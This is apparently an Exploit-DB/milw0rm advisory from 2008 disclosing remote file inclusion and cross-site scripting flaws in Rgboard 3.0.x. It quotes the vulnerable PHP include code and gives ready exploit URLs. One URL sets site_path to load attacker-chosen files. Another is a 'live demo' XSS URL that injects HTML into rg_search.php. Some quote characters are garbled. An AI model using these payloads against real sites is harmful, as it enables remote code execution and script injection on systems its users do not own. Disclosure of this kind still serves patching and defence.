Lucene search
E.wiZz!EDB-ID:5620HistoryMay 14, 2008 - 12:00 a.m.
rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting
2008-05-1400:00:00
e.wiZz!
www.exploit-db.com
66
################################################
# Rgboard 3.0.x Multiple Vulnerabilities #
# (RFI/XSS) #
################################################
/**/ Author:: e.wiZz!
/**/ Site:: www.balcanwarez.com
/**/ Contact:: N/A :D
===========================================================
/**/ Script :: Rgboard
/**/ Vulnerable version :: 3.0.0/3.0.12
/**/ Not vulnerable :: 4.0
/**/ Download :: www.rgboard.com
============================================================
[<Remote File Include>]
/**/ Vulnerable code,line 22:
\include\bbs.lib.inc.php
if (!defined(’BBS_LIB_INC_INCLUDED’)) {
define(’BBS_LIB_INC_INCLUDED’, 1);
// *start of include,eh?*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.phpâ€;
//$site_path
/**/ Exploit:
http://www.target.com/include/bbs.lib.inc.php?site_path=evilthingg0ezhere
[<XSS>]
/**/ Almost every field is vulnerable to xss,example(rg_search.php):
/**/ Live demo:
http://xxx.com/rgboard/rg_search.php?bbs_id=search&page_no=2&s_text=%22%3E%3Ca+href%3D%22http%3A%2F%2Fbalcanwarez.com%22%3E%3Ch1%3EOvdje nesto bezze upises,boli me kita :D%3C%2Fh1%3E%3C%2Fa%3E
==============================================================
/**/ Thanx : QKrun1x,F34R,aluigi,Nuclear,aluigi,str0ke
/**/ PozdraF : deckima s elitesecurity.org i cyber-underground.org
===============================================================
# milw0rm.com [2008-05-14]